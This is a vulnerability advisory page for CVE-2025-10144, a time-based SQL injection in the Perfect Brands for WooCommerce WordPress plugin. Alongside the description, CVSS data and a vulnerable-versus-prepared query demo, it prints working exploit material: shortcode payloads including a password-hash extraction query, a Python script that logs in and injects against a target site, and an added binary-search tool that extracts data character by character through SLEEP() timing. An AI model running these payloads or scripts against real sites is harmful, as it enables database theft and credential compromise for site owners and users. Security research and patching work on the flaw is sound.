Security Vulnerability Report
CVE-2025-10144 CVSS 6.5 MEDIUM

CVE-2025-10144

Published: 2025-11-24 23:15:47
Last Modified: 2026-04-15 00:35:42

Description

The Perfect Brands for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the `brands` attribute of the `products` shortcode in all versions up to, and including, 3.6.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
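The query pattern the description refers to, as an added illustration (this is not the plugin's code and is not derived from its source): a shortcode attribute interpolated straight into an `IN (...)` clause, next to a hardened version that restricts the attribute to integer IDs and binds them as query parameters, the way `$wpdb->prepare()` with `%d` placeholders would in WordPress. SQLite stands in for MySQL, and the `wp_terms` / `wp_users` rows are constructed for the example.

```python
"""Added illustration (not the plugin's code and not derived from its source):
the query pattern the advisory describes, a shortcode attribute interpolated
straight into an IN (...) clause, beside a hardened version that whitelists
the attribute to integer IDs and binds them as query parameters. SQLite
stands in for MySQL and the wp_terms / wp_users rows are constructed."""
import re
import sqlite3


def make_db():
    """Constructed sample tables named after their WordPress counterparts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_terms (term_id INTEGER PRIMARY KEY, name TEXT)")
    conn.executemany("INSERT INTO wp_terms VALUES (?, ?)",
                     [(1, "Acme"), (2, "Globex"), (3, "Initech")])
    conn.execute("CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, "
                 "user_login TEXT, user_pass TEXT)")
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', '$P$Bconstructedhash')")
    return conn


def brands_vulnerable(conn, brands):
    """Unsafe: the attribute value becomes part of the SQL text, so anything
    after a closing parenthesis is executed as SQL (CWE-89)."""
    sql = f"SELECT term_id, name FROM wp_terms WHERE term_id IN ({brands})"
    return conn.execute(sql).fetchall()


def parse_brand_ids(brands):
    """Whitelist: the attribute may only be a comma-separated list of positive
    integers; anything else is rejected before it gets near the query."""
    ids = []
    for part in str(brands).split(","):
        part = part.strip()
        if not re.fullmatch(r"[1-9][0-9]*", part):
            raise ValueError(f"invalid brand id: {part!r}")
        ids.append(int(part))
    return ids


def brands_prepared(conn, brands):
    """Hardened: one placeholder per ID, values bound by the driver, the same
    way $wpdb->prepare() with %d placeholders would do it in the plugin."""
    ids = parse_brand_ids(brands)
    placeholders = ",".join("?" * len(ids))
    sql = f"SELECT term_id, name FROM wp_terms WHERE term_id IN ({placeholders})"
    return conn.execute(sql, ids).fetchall()


def is_rejected(brands):
    """True when the hardened parser refuses the attribute value."""
    try:
        parse_brand_ids(brands)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print("legitimate:", brands_vulnerable(db, "1,2"))
    # Tautology: returns every brand instead of brand 1.
    print("OR 1=1   :", brands_vulnerable(db, "1) OR 1=1 --"))
    # UNION into another table: reads user data through the products query.
    print("UNION    :", brands_vulnerable(db, "0) UNION SELECT ID, user_login FROM wp_users --"))
    print("prepared :", brands_prepared(db, "1, 2"))
    print("rejected :", is_rejected("1) OR 1=1 --"))
```

The tautology and UNION inputs both pass through the vulnerable function unchanged, which is the "append additional SQL queries" behaviour the description names; the prepared version refuses them at the parser before any SQL is built, and a whitelist of integers is simpler to reason about than escaping a string that was never meant to contain one.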

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is recorded for this CVE. Affected versions, from the description:

Perfect Brands for WooCommerce <= 3.6.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
Shortcode payloads. Each is placed in post content by an account with Contributor-level access or higher. WordPress expands shortcodes when content is displayed, not when it is saved, so the injected query only runs when the post containing it is rendered (for example when the draft is previewed).

Basic injection test (time-based):
[products brands='1' AND (SELECT 1 FROM (SELECT SLEEP(5))test)-- ']

Major database version check (the response is delayed only if @@version starts with 8):
[products brands='1' UNION SELECT IF(SUBSTRING(@@version,1,1)='8',SLEEP(5),0)-- ']

Table existence check (wp_options):
[products brands='1' AND (SELECT CASE WHEN (SELECT COUNT(*) FROM wp_options)>0 THEN SLEEP(3) ELSE SLEEP(0) END)-- ']

User credential extraction example (UNHEX('PASSWORD_HASH') is a placeholder for the hash bytes being tested):
[products brands='1' UNION SELECT 1,2,3,IF(SUBSTRING(user_pass,1,4)=UNHEX('PASSWORD_HASH'),SLEEP(5),0) FROM wp_users LIMIT 1-- ']

The UNION forms assume the injected SELECT has the same column count as the original query; the AND forms do not depend on it.

Python exploit script for CVE-2025-10144:

python
import time
import requests

target_url = "https://target-site.com/"
wp_session = requests.Session()

# Log in with a Contributor-level (or higher) account.
wp_session.post(target_url + "wp-login.php", data={
    "log": "attacker_username",
    "pwd": "attacker_password",
})


def test_sql_injection():
    """Time-based blind check: a true condition should delay the response by ~5 s."""
    # True condition: SLEEP(5) runs when the injected query executes.
    true_payload = "1' AND (SELECT * FROM (SELECT SLEEP(5))test)-- "
    # False condition: no delay; use it as the baseline the true case is compared against.
    false_payload = "1' AND 1=2-- "

    post_data = {
        "content": f"[products brands='{true_payload}']",
        "post_status": "draft",
    }
    # NOTE: as written this times the request that saves the draft.
    # wp-admin/post.php also expects an action and a valid nonce, and the
    # shortcode only runs when the content is rendered, so time the request
    # that renders it (e.g. a preview of the draft) and compare it with the
    # same request made using false_payload.
    start = time.perf_counter()
    wp_session.post(target_url + "wp-admin/post.php", data=post_data)
    elapsed = time.perf_counter() - start

    if elapsed > 4:
        print("[+] SQL Injection confirmed!")
    else:
        print("[-] Injection failed")


if __name__ == "__main__":
    test_sql_injection()
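The script above decides on a single request against a fixed 4-second threshold, which is fragile on a real network and only answers yes or no. The following is an added example, not the page's PoC and not the plugin's code, that generalises the same SLEEP()-based oracle to full character extraction: it measures a baseline with a condition that is always false, decides each condition from the minimum of repeated timings, and binary-searches the 7-bit ASCII range so each character costs seven requests rather than up to 128. The target is simulated in-process so the script runs offline; `SECRET_VERSION` stands in for the target's `@@version`, and against a real site the `send()` callable would perform the HTTP request that renders a post containing `[products brands='<payload>']` and return the elapsed seconds.

```python
"""Added example (not the page's PoC and not the plugin's code): a time-based
blind SQL injection oracle that generalises the single SLEEP(5) check to
full character extraction. The target is simulated in-process so the script
runs offline; against a real site, send() would perform the HTTP request
that renders a post containing [products brands='<payload>'].
"""
import re
import time

DELAY = 0.02  # seconds asked of SLEEP(); a real engagement would use ~5
SECRET_VERSION = "8.0.36"  # constructed stand-in for the target's @@version

# Recognises the condition build_payload() injects; the simulated target
# evaluates it against SECRET_VERSION instead of running MySQL.
_COND = re.compile(r"ASCII\(SUBSTRING\(@@version,(\d+),1\)\)>(\d+)")


def simulated_target(payload):
    """Stand-in for the vulnerable site. Sleeps DELAY seconds when the
    injected condition is true, as SLEEP() would, and returns the elapsed
    wall-clock time in seconds (what a real send() would measure)."""
    start = time.perf_counter()
    m = _COND.search(payload)
    if m:
        pos, threshold = int(m.group(1)), int(m.group(2))
        ch = SECRET_VERSION[pos - 1:pos]      # MySQL SUBSTRING is 1-based
        code = ord(ch) if ch else 0           # ASCII('') is 0 past the end
        if code > threshold:
            time.sleep(DELAY)
    return time.perf_counter() - start


def build_payload(pos, threshold, delay):
    """Value for the brands attribute: delays the response iff the character
    at position pos of @@version has an ASCII code greater than threshold."""
    return (f"1' AND IF(ASCII(SUBSTRING(@@version,{pos},1))>{threshold},"
            f"SLEEP({delay}),0)-- ")


def condition_holds(send, payload, baseline, delay, trials=2):
    """A true condition can never return faster than baseline + delay, so the
    minimum over several tries is robust to jitter that only adds latency."""
    samples = [send(payload) for _ in range(trials)]
    return min(samples) >= baseline + delay / 2


def extract_char(send, pos, baseline, delay):
    """Binary search over the 7-bit ASCII range: 7 requests per character
    instead of up to 128 equality tests."""
    lo, hi = 0, 127
    while lo < hi:
        mid = (lo + hi) // 2
        if condition_holds(send, build_payload(pos, mid, delay), baseline, delay):
            lo = mid + 1
        else:
            hi = mid
    return chr(lo)


def extract_string(send, max_len, delay=DELAY):
    """Recover @@version character by character, stopping at the first
    position whose ASCII code is 0 (past the end of the string)."""
    # Baseline from a condition that is always false (no char code exceeds 999).
    baseline = min(send(build_payload(1, 999, delay)) for _ in range(3))
    out = ""
    for pos in range(1, max_len + 1):
        ch = extract_char(send, pos, baseline, delay)
        if ch == "\x00":
            break
        out += ch
    return out


if __name__ == "__main__":
    print("recovered @@version:", extract_string(simulated_target, 10))
```

Taking the minimum rather than the mean is deliberate: network jitter can only make a false condition look slower, never make a true one (which sleeps for the full delay inside the database) return faster, so the minimum is the statistic an attacker, or a detection engineer replaying the traffic, should reason about. On the defensive side the same structure is what to look for in logs: many near-identical requests rendering a post whose `brands` value differs only in a numeric threshold.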

References

https://plugins.trac.wordpress.org/browser/perfect-woocommerce-brands/tags/3.6.0/lib/class-woocommerce.php#L112 (plugin source, 3.6.0 tag, line 112)
https://www.wordfence.com/threat-intel/vulnerabilities/id/f4618bfd-77d9-4396-b041-d7ba0f6ec75a?source=cve (Wordfence advisory)
Weakness: CWE-89 (SQL Injection)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-10144", "sourceIdentifier": "[email protected]", "published": "2025-11-24T23:15:46.880", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Perfect Brands for WooCommerce plugin for WordPress is vulnerable to time-based SQL Injection via the `brands` attribute of the `products` shortcode in all versions up to, and including, 3.6.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/perfect-woocommerce-brands/tags/3.6.0/lib/class-woocommerce.php#L112", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f4618bfd-77d9-4396-b041-d7ba0f6ec75a?source=cve", "source": "[email protected]"}]}}